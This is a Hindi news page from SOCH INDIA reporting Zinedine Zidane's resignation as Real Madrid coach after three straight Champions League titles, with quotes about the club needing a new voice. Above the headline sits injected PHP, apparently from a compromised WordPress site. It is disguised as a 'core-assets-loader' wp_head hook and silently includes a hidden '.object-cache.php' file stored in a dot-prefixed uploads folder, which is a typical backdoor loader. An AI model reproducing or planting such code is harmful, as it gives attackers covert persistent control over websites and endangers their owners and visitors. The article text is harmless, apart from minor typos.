add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); लगातार चैंपियन बनाने के बाद जिनेदिन जिदान ने छोड़ा रियाल मेड्रिड का साथ – SOCH INDIA
Menu

लगातार चैंपियन बनाने के बाद जिनेदिन जिदान ने छोड़ा रियाल मेड्रिड का साथ

nobanner

स्पेनिश क्लब रियाल मेड्रिड को पिछले सप्ताह लगातार तीसरी बार चैम्पियंस लीग का खिताब दिलाने वाले कोच जिनेदिन जिदान ने अपने पद से इस्तीफा देकर सभी को हैरानी में डाल दिया है.

पिछले शनिवार को खेले गए मैच में रियाल ने लीवरपूल को 3-1 से हराकर लगातार तीसरी बार चैम्पियंस लीग खिताब जीता था. ऐसे में जिदान पहले ऐसे कोच बन गए जिनके मार्गदर्शन में क्लब ने लगातार तीन बार लीग खिताब जीता.

जिदान का कहना है कि क्लब को एक नई आवाज की जरूरत है. जिदान ने गुरुवार को घोषणा करते हुए कहा कि क्लब में बदलाव की जरूरत है और इसीलिए, उन्होंने यह फैसला लिया.

बीबीसी की रिपोर्ट के अनुसार, पिछले सप्ताह लगातार तीसरी बार चैम्पियंस लीग का खिताब दिलाने वाले फ्रेंच कोच जिदान पहले ऐसे कोच बन गए जिनके मार्गदर्शन में क्लब ने लगातार तीन बार लीग खिताब जीता.

फ्रांस के 45 वर्षीय निवासी जिदान ने कहा, “मुझे इस क्लब से प्यार है. मेरा यह मानना है कि इस टीम को जीत की राह पर अपना सफर बरकरार रखना चाहिए, लेकिन मुझे लगता है कि इसे बदलाव की जरूरत है.”

जिदान ने कहा, “इस क्लब को एक नई आवाज की जरूरत है, एक नई पद्धति की जरूरत है और इसीलिए, मैंने यह फैसला लिया है.”

उल्लेखनीय है कि इस साल फरवरी में एक बयान में जिदान ने कहा था कि अगर उन्हें ऐसा महसूस हुआ कि उनकी ओर से क्लब को और कुछ देने की जरूरत नहीं है, तो वह कोच पद से अलग हो जाएंगे.

जिदान ने कहा, “मुझे पता है कि इस प्रकार के फैसले लेने का यह पल अजीब है, लेकिन यह जरूरी था. मुझे सबके लिए यह करना ही था.”

2016 में टीम के साथ जुड़ने वाले जिदान ने रियाल को तीन बार चैंपियंस लीग खिताब के साथ 2016-17 में ला लीगा चैंपियन बनाया. इतना ही नहीं इस दौरान रियार लो बार फीफा क्लब वर्ल्ड कप विजेता टीम भी बनी. इस दौरन टीम ने दो बार UEFA सुपर कप और एक स्पेनिश कप जीता.

Leave a Comment

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>